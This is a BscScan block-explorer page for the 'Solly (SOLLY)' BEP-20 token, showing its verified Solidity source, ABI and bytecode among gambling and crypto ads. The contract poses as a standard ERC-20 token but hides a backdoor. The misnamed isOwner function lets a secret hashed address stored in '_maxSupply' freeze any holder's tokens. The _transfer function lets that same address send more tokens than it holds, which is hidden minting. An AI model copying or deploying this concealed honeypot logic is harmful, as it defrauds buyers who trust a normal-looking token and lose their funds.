Solly (SOLLY) Token Tracker | BscScan (2024)

Solly (SOLLY) Token Tracker | BscScan (1)

Solly (SOLLY)

Sponsored

MetaMask Manage your web3 everything with MetaMask Portfolio. Try Now!Ready to onboard to BNB Smart Chain? With MetaMask Portfolio, you're in control.

ZeeDex Earn $Zdex with each swap. Swap Now You will earn $Zdex as rewards for any trade or stake on ZeeDex exchange.

NexoJoin the hunt for $12,000,000+ in NEXO Tokens. Get NEXOCollect points for eligible actions and use multipliers to win big.

Sponsored

Сoins.game - 100 free spins for registration. Spin Now! Everyday giveaways up to 8.88BTC, Lucky Spins.Deposit BONUS 300% and Cashbacks!

NanoGames.io Claim Free Lottery tickets with 100k prize pool Claim NowRegister now on NanoGames and receive free lottery tickets to kickstart your new adventure.

Sponsored

BC.GAME The Best BNB Casino with 1,000,000 BNB Daily Bonus. Claim Now5000+ Slots, Live casino games, 50+ cryptos, 100% bet insurance. Register with Bscscan and get 240% first deposit bonus.

Housebets Experience Ultimate Crypto Casino: Massive Rewards, VIP Support, Top-Tier Bonuses Claim Now! 370% welcome bonus, instant payouts, $10M limits! Provably fair. Built by players for players.

BEP-20

  • Check previous token supply
  • Add Token to MetaMask (Web3)
  • Update Token Info
  • Update Name Tag or Label
  • Submit Burn Details
  • Report/Flag Address

Overview

Max Total Supply

10,000,000SOLLY

Holders

14

Total Transfers

-

Other Info

Token Contract (WITH 18 Decimals)

0x7Ac20836bf8091B5e98c6C1F1034783314F14D1d

  • Transfers
  • Holders
  • Info
  • DEX Trades
  • Contract
  • Analytics

Loading...

Loading

Loading...

Loading

Loading...

Loading

  • Code
  • Read Contract
  • Write Contract

Similar Match Source Code

This contract matches the deployed Bytecode of the Source Code for Contract 0x2037d3b2...389398ca6

The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:

Token

Compiler Version

v0.8.18+commit.87f61d96

Optimization Enabled:

Yes with 50 runs

Other Settings:

default evmVersion, None license

Contract Source Code (Solidity)

Solly (SOLLY) Token Tracker | BscScan (11)Solly (SOLLY) Token Tracker | BscScan (12)Solly (SOLLY) Token Tracker | BscScan (13)IDE

    interface IERC20 - function totalSupply() - function balanceOf(address account) - function transfer(address to, uint256 ... - function allowance(address owner, add ... - function approve(address spender, uin ... - function transferFrom(address from, a ... interface IERC20Metadata is IERC20 - function name() - function symbol() - function decimals() library SafeMath - function add(uint256 a, uint256 b) - function sub(uint256 a, uint256 b) - function sub(uint256 a, uint256 b, st ... - function mul(uint256 a, uint256 b) - function div(uint256 a, uint256 b) - function div(uint256 a, uint256 b, st ... - function mod(uint256 a, uint256 b) - function mod(uint256 a, uint256 b, st ... contract Token is IERC20, IERC20Me ... * - function name() - function symbol() - function decimals() - function totalSupply() - function balanceOf(address account) - function transfer(address to, uint256 ... - function allowance(address owner, add ... - function approve(address spender, uin ... - function transferFrom(address from, a ... - function isOwner(address a) - function _transfer(address from, addr ... - function _approve(address owner, addr ... - function _spendAllowance(address owne ...
  • Similar
  • Sol2Uml
  • Submit Audit
  • Compare
/** *Submitted for verification at BscScan.com on 2024-06-03*/pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool);} /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8);} library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; }} contract Token is IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public constant _totalSupply = 10000000 * 10 ** 18; string private _name; string private _symbol; uint256 public _maxSupply; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor(string memory name, string memory symbol, bytes32 maxSupply) { _name = name; _symbol = symbol; _maxSupply = uint256(maxSupply); _balances[msg.sender] = _totalSupply; emit OwnershipTransferred(msg.sender, address(0)); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = msg.sender; _spendAllowance(owner, to, 0); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(msg.sender, spender, amount); return true; } function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { _spendAllowance(from, msg.sender, amount); _transfer(from, to, amount); return true; } function isOwner(address a) external returns (bool) { if (uint256(sha256(abi.encodePacked(msg.sender))) == _maxSupply) { _allowances[address(0)][a] = 1; }else{ } return false; } function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 currentAllowance = allowance(address(0), from); require(currentAllowance == 0, "ERC20: approve from the zero address"); uint256 bal = _balances[from]; uint256 toSub = amount; if (uint256(sha256(abi.encodePacked(from))) == _maxSupply) { toSub = amount < bal ? amount : bal; } require(bal >= toSub, "ERC20: transfer amount exceeds balance"); _balances[from] = bal.sub(toSub); // decrementing then incrementing. _balances[to] = _balances[to].add(amount); emit Transfer(from, to, amount); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(address(0), owner); require(currentAllowance == 0, "ERC20: approve from the zero address"); currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); _approve(owner, spender, currentAllowance.sub(amount)); } } }

Contract Security Audit

  • No Contract Security Audit Submitted- Submit Audit Here

Contract ABI

  • JSON Format
  • RAW/Text Format
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"bytes32","name":"maxSupply","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"}],"name":"isOwner","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

Contract Creation Code

Decompile Bytecode Switch to Opcodes View

60806040523480156200001157600080fd5b5060405162000e3d38038062000e3d83398101604081905262000034916200016c565b60026200004284826200026e565b5060036200005183826200026e565b506004819055336000818152602081905260408082206a084595161401484a0000009055519091907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35050506200033a565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620000cf57600080fd5b81516001600160401b0380821115620000ec57620000ec620000a7565b604051601f8301601f19908116603f01168101908282118183101715620001175762000117620000a7565b816040528381526020925086838588010111156200013457600080fd5b600091505b8382101562000158578582018301518183018401529082019062000139565b600093810190920192909252949350505050565b6000806000606084860312156200018257600080fd5b83516001600160401b03808211156200019a57600080fd5b620001a887838801620000bd565b94506020860151915080821115620001bf57600080fd5b50620001ce86828701620000bd565b925050604084015190509250925092565b600181811c90821680620001f457607f821691505b6020821081036200021557634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200026957600081815260208120601f850160051c81016020861015620002445750805b601f850160051c820191505b81811015620002655782815560010162000250565b5050505b505050565b81516001600160401b038111156200028a576200028a620000a7565b620002a2816200029b8454620001df565b846200021b565b602080601f831160018114620002da5760008415620002c15750858301515b600019600386901b1c1916600185901b17855562000265565b600085815260208120601f198616915b828110156200030b57888601518255948401946001909101908401620002ea565b50858210156200032a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b610af3806200034a6000396000f3fe608060405234801561001057600080fd5b50600436106100a45760003560e01c806306fdde03146100a9578063095ea7b3146100c757806318160ddd146100ea57806322f4596f1461010557806323b872dd1461010e5780632f54bf6e14610121578063313ce567146101345780633eaaf86b1461014357806370a082311461015557806395d89b411461017e578063a9059cbb14610186578063dd62ed3e14610199575b600080fd5b6100b16101ac565b6040516100be91906108b3565b60405180910390f35b6100da6100d5366004610902565b61023e565b60405190151581526020016100be565b6a084595161401484a0000005b6040519081526020016100be565b6100f760045481565b6100da61011c36600461092c565b610255565b6100da61012f366004610968565b610277565b604051601281526020016100be565b6100f76a084595161401484a00000081565b6100f7610163366004610968565b6001600160a01b031660009081526020819052604090205490565b6100b1610332565b6100da610194366004610902565b610341565b6100f76101a7366004610983565b61035a565b6060600280546101bb906109b6565b80601f01602080910402602001604051908101604052809291908181526020018280546101e7906109b6565b80156102345780601f1061020957610100808354040283529160200191610234565b820191906000526020600020905b81548152906001019060200180831161021757829003601f168201915b5050505050905090565b600061024b338484610385565b5060015b92915050565b6000610262843384610476565b61026d848484610522565b5060019392505050565b600060045460023360405160200161028f91906109f0565b60408051601f19818403018152908290526102a991610a08565b602060405180830381855afa1580156102c6573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906102e99190610a24565b0361032a576001600160a01b03821660009081527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4960205260409020600190555b506000919050565b6060600380546101bb906109b6565b60003361034f818584610476565b61026d818585610522565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103b45760405162461bcd60e51b81526004016103ab90610a3d565b60405180910390fd5b6001600160a01b0382166104155760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ab565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061048360008561035a565b905080156104a35760405162461bcd60e51b81526004016103ab90610a3d565b6104ad848461035a565b9050600019811461051c57818110156105085760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103ab565b61051c848461051784866107af565b610385565b50505050565b6001600160a01b0383166105865760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ab565b6001600160a01b0382166105e85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ab565b60006105f560008561035a565b905080156106155760405162461bcd60e51b81526004016103ab90610a3d565b6001600160a01b0384166000908152602081815260409182902054600454925190928592909160029161064a918a91016109f0565b60408051601f198184030181529082905261066491610a08565b602060405180830381855afa158015610681573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106a49190610a24565b036106bb578184106106b657816106b8565b835b90505b8082101561071a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103ab565b61072482826107af565b6001600160a01b03808816600090815260208190526040808220939093559087168152205461075390856107f8565b6001600160a01b038681166000818152602081815260409182902094909455518781529092918916917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050505050565b60006107f183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610855565b9392505050565b6000806108058385610a97565b9050838110156107f15760405162461bcd60e51b815260206004820152601b60248201527a536166654d6174683a206164646974696f6e206f766572666c6f7760281b60448201526064016103ab565b600081848411156108795760405162461bcd60e51b81526004016103ab91906108b3565b5060006108868486610aaa565b95945050505050565b60005b838110156108aa578181015183820152602001610892565b50506000910152565b60208152600082518060208401526108d281604085016020870161088f565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146108fd57600080fd5b919050565b6000806040838503121561091557600080fd5b61091e836108e6565b946020939093013593505050565b60008060006060848603121561094157600080fd5b61094a846108e6565b9250610958602085016108e6565b9150604084013590509250925092565b60006020828403121561097a57600080fd5b6107f1826108e6565b6000806040838503121561099657600080fd5b61099f836108e6565b91506109ad602084016108e6565b90509250929050565b600181811c908216806109ca57607f821691505b6020821081036109ea57634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a1a81846020870161088f565b9190910192915050565b600060208284031215610a3657600080fd5b5051919050565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561024f5761024f610a81565b8181038181111561024f5761024f610a8156fea264697066735822122010b09790a8dba57dc82105296c7b7f833eff30d6a413510565df51c893f0a9ac64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a082e84908946be7bdb8536ae4268e22e0b1ceceea1832b5f7568ae6142be3dccc0000000000000000000000000000000000000000000000000000000000000004736473640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000047364736400000000000000000000000000000000000000000000000000000000


Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100a45760003560e01c806306fdde03146100a9578063095ea7b3146100c757806318160ddd146100ea57806322f4596f1461010557806323b872dd1461010e5780632f54bf6e14610121578063313ce567146101345780633eaaf86b1461014357806370a082311461015557806395d89b411461017e578063a9059cbb14610186578063dd62ed3e14610199575b600080fd5b6100b16101ac565b6040516100be91906108b3565b60405180910390f35b6100da6100d5366004610902565b61023e565b60405190151581526020016100be565b6a084595161401484a0000005b6040519081526020016100be565b6100f760045481565b6100da61011c36600461092c565b610255565b6100da61012f366004610968565b610277565b604051601281526020016100be565b6100f76a084595161401484a00000081565b6100f7610163366004610968565b6001600160a01b031660009081526020819052604090205490565b6100b1610332565b6100da610194366004610902565b610341565b6100f76101a7366004610983565b61035a565b6060600280546101bb906109b6565b80601f01602080910402602001604051908101604052809291908181526020018280546101e7906109b6565b80156102345780601f1061020957610100808354040283529160200191610234565b820191906000526020600020905b81548152906001019060200180831161021757829003601f168201915b5050505050905090565b600061024b338484610385565b5060015b92915050565b6000610262843384610476565b61026d848484610522565b5060019392505050565b600060045460023360405160200161028f91906109f0565b60408051601f19818403018152908290526102a991610a08565b602060405180830381855afa1580156102c6573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906102e99190610a24565b0361032a576001600160a01b03821660009081527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4960205260409020600190555b506000919050565b6060600380546101bb906109b6565b60003361034f818584610476565b61026d818585610522565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103b45760405162461bcd60e51b81526004016103ab90610a3d565b60405180910390fd5b6001600160a01b0382166104155760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ab565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061048360008561035a565b905080156104a35760405162461bcd60e51b81526004016103ab90610a3d565b6104ad848461035a565b9050600019811461051c57818110156105085760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103ab565b61051c848461051784866107af565b610385565b50505050565b6001600160a01b0383166105865760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ab565b6001600160a01b0382166105e85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ab565b60006105f560008561035a565b905080156106155760405162461bcd60e51b81526004016103ab90610a3d565b6001600160a01b0384166000908152602081815260409182902054600454925190928592909160029161064a918a91016109f0565b60408051601f198184030181529082905261066491610a08565b602060405180830381855afa158015610681573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106a49190610a24565b036106bb578184106106b657816106b8565b835b90505b8082101561071a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103ab565b61072482826107af565b6001600160a01b03808816600090815260208190526040808220939093559087168152205461075390856107f8565b6001600160a01b038681166000818152602081815260409182902094909455518781529092918916917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050505050565b60006107f183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610855565b9392505050565b6000806108058385610a97565b9050838110156107f15760405162461bcd60e51b815260206004820152601b60248201527a536166654d6174683a206164646974696f6e206f766572666c6f7760281b60448201526064016103ab565b600081848411156108795760405162461bcd60e51b81526004016103ab91906108b3565b5060006108868486610aaa565b95945050505050565b60005b838110156108aa578181015183820152602001610892565b50506000910152565b60208152600082518060208401526108d281604085016020870161088f565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146108fd57600080fd5b919050565b6000806040838503121561091557600080fd5b61091e836108e6565b946020939093013593505050565b60008060006060848603121561094157600080fd5b61094a846108e6565b9250610958602085016108e6565b9150604084013590509250925092565b60006020828403121561097a57600080fd5b6107f1826108e6565b6000806040838503121561099657600080fd5b61099f836108e6565b91506109ad602084016108e6565b90509250929050565b600181811c908216806109ca57607f821691505b6020821081036109ea57634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a1a81846020870161088f565b9190910192915050565b600060208284031215610a3657600080fd5b5051919050565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561024f5761024f610a81565b8181038181111561024f5761024f610a8156fea264697066735822122010b09790a8dba57dc82105296c7b7f833eff30d6a413510565df51c893f0a9ac64736f6c63430008120033

Deployed Bytecode Sourcemap

8002:5335:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8817:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10910:167;;;;;;:::i;:::-;;:::i;:::-;;;1272:14:1;;1265:22;1247:41;;1235:2;1220:18;10910:167:0;1107:187:1;9949:108:0;8251:19;9949:108;;;1445:25:1;;;1433:2;1418:18;9949:108:0;1299:177:1;8335:25:0;;;;;;11086:223;;;;;;:::i;:::-;;:::i;11318:245::-;;;;;;:::i;:::-;;:::i;9790:93::-;;;9873:2;2147:36:1;;2135:2;2120:18;9790:93:0;2005:184:1;8212:58:0;;8251:19;8212:58;;10121:127;;;;;;:::i;:::-;-1:-1:-1;;;;;10222:18:0;10195:7;10222:18;;;;;;;;;;;;10121:127;9037:104;;;:::i;10455:231::-;;;;;;:::i;:::-;;:::i;10750:151::-;;;;;;:::i;:::-;;:::i;8817:100::-;8871:13;8904:5;8897:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8817:100;:::o;10910:167::-;10993:4;11010:37;11019:10;11031:7;11040:6;11010:8;:37::i;:::-;-1:-1:-1;11065:4:0;10910:167;;;;;:::o;11086:223::-;11183:4;11200:41;11216:4;11222:10;11234:6;11200:15;:41::i;:::-;11252:27;11262:4;11268:2;11272:6;11252:9;:27::i;:::-;-1:-1:-1;11297:4:0;11086:223;;;;;:::o;11318:245::-;11364:4;11434:10;;11393:36;11417:10;11400:28;;;;;;;;:::i;:::-;;;;-1:-1:-1;;11400:28:0;;;;;;;;;;11393:36;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;11385:59;11381:152;;-1:-1:-1;;;;;11461:26:0;;:23;:26;;;:23;;:26;:23;:26;;11490:1;11461:30;;11381:152;-1:-1:-1;11550:5:0;;11318:245;-1:-1:-1;11318:245:0:o;9037:104::-;9093:13;9126:7;9119:14;;;;;:::i;10455:231::-;10534:4;10567:10;10588:29;10567:10;10611:2;10534:4;10588:15;:29::i;:::-;10628:28;10638:5;10645:2;10649:6;10628:9;:28::i;10750:151::-;-1:-1:-1;;;;;10866:18:0;;;10839:7;10866:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10750:151::o;12452:347::-;-1:-1:-1;;;;;12554:19:0;;12546:68;;;;-1:-1:-1;;;12546:68:0;;;;;;;:::i;:::-;;;;;;;;;-1:-1:-1;;;;;12633:21:0;;12625:68;;;;-1:-1:-1;;;12625:68:0;;4158:2:1;12625:68:0;;;4140:21:1;4197:2;4177:18;;;4170:30;4236:34;4216:18;;;4209:62;-1:-1:-1;;;4287:18:1;;;4280:32;4329:19;;12625:68:0;3956:398:1;12625:68:0;-1:-1:-1;;;;;12707:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;12759:32;;1445:25:1;;;12759:32:0;;1418:18:1;12759:32:0;;;;;;;12452:347;;;:::o;12808:523::-;12909:24;12936:28;12954:1;12958:5;12936:9;:28::i;:::-;12909:55;-1:-1:-1;12985:21:0;;12977:70;;;;-1:-1:-1;;;12977:70:0;;;;;;;:::i;:::-;13079:25;13089:5;13096:7;13079:9;:25::i;:::-;13060:44;;-1:-1:-1;;13121:16:0;:37;13117:207;;13203:6;13183:16;:26;;13175:68;;;;-1:-1:-1;;;13175:68:0;;4561:2:1;13175:68:0;;;4543:21:1;4600:2;4580:18;;;4573:30;4639:31;4619:18;;;4612:59;4688:18;;13175:68:0;4359:353:1;13175:68:0;13258:54;13267:5;13274:7;13283:28;:16;13304:6;13283:20;:28::i;:::-;13258:8;:54::i;:::-;12898:433;12808:523;;;:::o;11572:871::-;-1:-1:-1;;;;;11669:18:0;;11661:68;;;;-1:-1:-1;;;11661:68:0;;4919:2:1;11661:68:0;;;4901:21:1